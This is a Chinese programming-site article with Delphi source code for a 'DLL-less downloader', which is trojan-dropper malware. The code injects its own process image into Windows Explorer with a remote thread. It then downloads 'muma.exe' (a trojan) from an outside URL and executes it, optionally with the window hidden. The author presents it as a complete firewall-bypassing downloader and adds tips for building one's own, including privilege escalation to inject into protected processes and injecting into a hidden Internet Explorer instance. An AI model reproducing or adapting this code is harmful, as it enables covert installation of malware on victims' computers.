新客网WWW.XKER.COM:致力做中国最专业的网络学院!
模糊搜索
标题搜索
最新更新
新客商城
网站地图
RSS订阅
首页
新闻中心
网络学院
软件开发
站长之家
软件下载
手机学院
桌面壁纸
专题
论坛
学院:
操作系统
-
网络应用
-
服务器
-
网络安全
-
工具软件
-
办公软件
-
Web开发
-
数据库
-
网页设计
-
图形图像
-
媒体动画
-
硬件学堂
-
存储频道
-
QQ专区
您的位置:
首页
>
软件开发
>
.Net开发
>
Asp.net教程
> 正文:无DLL版Downloader的代码
无DLL版Downloader的代码
新客网
XKER.COM
2006-04-24 来源:
收藏本文
这份代码的思路来自于国外EES组织的Aphex。基本上所有的无DLL Download都是
利用的这种方法。其实也就是用烂了的远程注入法。不过注入的对象不是一个DLL,
而是本身的一个过程。下面是代码,由于本人专业知识不够,可能有些说法不太
专业。请大家凑合着看。有不懂的请跟贴。
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows, Urlmon;
procedure Download; //下载过程
begin
URLDownloadToFile(nil, 'http://www.mycode.ful.cn/muma.exe', 'C:\muma.exe', 0, nil);
WinExec('C:\muma.exe', SW_SHOW); //SW_SHOW or SW_HIDE
end;
var
hModule, hModule_News: Pointer;
Extent, Size, ThreadId: longword;
ProcessHandle, Pid: longword;
begin
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); //打开进程
hModule := Pointer(GetModuleHandle(nil));
//这里得到的值为一个返回一个指针型变量,指向内容包括自身映像的基址和长度
Extent := PImageOptionalHeader(Pointer(integer(hModule) + PImageDosHeader(hModule)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//得到内存映像的长度
VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
//在Exp进程的内存范围内分配一个足够长度的内存
hModule_News := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定起始基址和内存映像基址的位置
WriteProcessMemory(ProcessHandle, hModule_News, hModule, Extent, Size);
//确定上面各项数据后,这里开始进行操作
CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);
//建立远程线程,至此注入过程完成
CloseHandle(ProcessHandle);
//关闭对像
end.
需要说明的是,尽管这已经是一份完整的穿墙版Downloader的代码。但其还是有很多BUG的。如果你想写属于自己的下
载者,请注意解决下面几个问题:
1、上面的代码用到的远程注入的方法所用到的函数在Windows9X下没有。
2、Windows和一些应用程序对某些进程做了保护,不允许进程进行越权操作。如Svchost、QQ等进程的注入,必须先进行
提权操作。
3、若需注入到IE。请先用Winexec的SW_HIDE模式打开一个隐藏的IE进程,将程序挂起3秒后再进行注入。这个是针对一些
老机器而作的。
上一篇:
打开文件夹并且选中指定的文件的通用函数实现
下一篇:
在DOS方式下维护注册表
【
收藏
】 【
评论
】 【
推荐
】 【
投稿
】 【
打印
】 【
关闭
】
最新相关文章
·
身份证函数 查看身份证地区信息
·
VS2008 第一次安装心得及使用
·
ASP.NET 2.0跨网页提交的三法
·
编程实例 WebGroupBox(Aspx控件)
·
asp.net mvc脚手架代码生成工具
·
用独立的DLL来存储图片(资源文件)
·
ASP.NET中多国语言的实现方法
·
实例 .net生成静态页方法总结
·
ASP.NET控件学习笔记之ViewState
·
用递归在TreeView价节点
·
经验总结 关于.NET 中的Event机制
·
.NET应用程序开发标准化(z)
·
在DataTable中查询应该注意的问题
·
LINQ 中调用存储过程自动绑定列名
·
如何用.NET技术在线生成网站LOGO
·
对于访问IIS元数据库失败的解决
发表评论
(
要记得去论坛讨论,点击注册新会员
)
匿名评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
阅读排行
Asp.net Ajax 中的脚本错误: Sys未定义 的解决方
身份证号码15位升18位(C#)
asp.net ajax学习系列功能强大的UpdatePanel控件
Web Service描述语言 WSDL 详解(1)--为什么使用WS
Asp.Net Unleashed 2nd Edition 学习笔记 第三部
UpdatePanel与UrlRewrite
DataGridView 的分页处理
从资源文件里加载文件(C#)
Javascript与asp.net 实现Ajax多文件无刷新上传
关于ASP.NET调用JavaScript的实现
asp.net面试试题收集
基于ASP.NET AJAX的WebPart开发与部署
在VC++应用程序中读取文本数据
Huffman 编码简介(讲解的更好一些,有C的分析)
技巧 .NET如何访问MySQL数据库
专题教程
非主流Ps教程
磁碟机病毒专杀
AV终结者
会声会影教程
nero教程
FreeBSD使用大全
PDF阅读器
BT下载
QQ防骗术案例剖析
机器狗病毒查杀专题
搜狗拼音输入法专题
google earth专题
随机推荐
一个文件上传的类
精华的微软文章".NET 数据访问架构指南"
文件下载的权限控制(asp.net)
ASP.NET安全身份验证的实现
一个男人和三个女人的故事[《.net框架程序设计》
{asp.net2.0}信息采集系统王者归来版(无源码,只提
网站基础架构设计思路I
C#实现的18位身份证格式验证算法
使用 ASP+ 列表绑定控件 (转自ms 二)
代码重温:TZoCInetChecker——一个检测网络连接
数字转英文(货币)大写
asp.net关于文件在数据库的存入和读取
GetTickCount()函数精确到多少毫秒
如何在命令行下编译一个asp.net项目
C# Coding Standard
实用信息推荐
常用网页广告代码全集
中国电子地图
IP查询、IP签名
免费代理IP(每日更新)
免费周公解梦大全
html互转JS
FLASH休闲小游戏
flash动画
qq搞笑表情
最新电影大片
戴尔dell笔记本电脑订购
戴尔dell台式机电脑订购